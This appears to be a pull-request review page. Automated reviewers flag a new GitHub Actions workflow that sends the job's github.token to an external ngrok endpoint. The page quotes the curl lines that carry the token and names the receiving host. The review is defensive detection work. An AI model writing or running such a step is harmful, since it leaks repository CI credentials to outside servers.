Cursor Bugbot has reviewed your changes and found 1 potential issue.
❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, enable autofix in the Cursor dashboard.
Reviewed by Cursor Bugbot for commit 72fd957. Configure here.
| -H "X-Source: edge-gui-pr" \ | ||
| -d "{\"token\":\"$GH_TOKEN\"}" | ||
| env: | ||
| GH_TOKEN: ${{ github.token }} |
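Review bot: `-d "{\"token\":\"$GH_TOKEN\"}"` places the job's `github.token` (bound as `GH_TOKEN` in the `env:` block on the last line) in the body of a request that the `-H "X-Source: edge-gui-pr"` header shows is aimed at a non-GitHub endpoint, so the repository's CI credential leaves the runner; no workflow step should do this regardless of the receiving host. Drop the curl step. If an external service genuinely needs a build notification, send it only non-secret metadata (commit SHA, run id) and authenticate with a credential issued by that service, never with `github.token`.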
CI workflow exfiltrates GitHub token to external server
High Severity
The workflow sends the github.token to an external ngrok endpoint (nonconditional-charline-plashy.ngrok-free.dev) via curl. This exfiltrates the repository's CI credentials to a third-party server. The if: always() ensures the exfiltration runs even if prior steps fail, and the PR title itself states the intent is to "discover the github.token value." This is malicious code.


CHANGELOG
Does this branch warrant an entry to the CHANGELOG?
Dependencies
none
Requirements
If you have made any visual changes to the GUI, make sure you have:
Note
High Risk
High risk because it exfiltrates the github.token from CI to an external ngrok URL, which is security-sensitive. It also changes CI behavior on every push and runs the submission step unconditionally (if: always()).
Overview
Adds a new .github/workflows/ci.yml GitHub Actions workflow that runs on every push, installs Node/Yarn dependencies, and then always executes a curl POST to an external ngrok URL including the github.token in the request payload.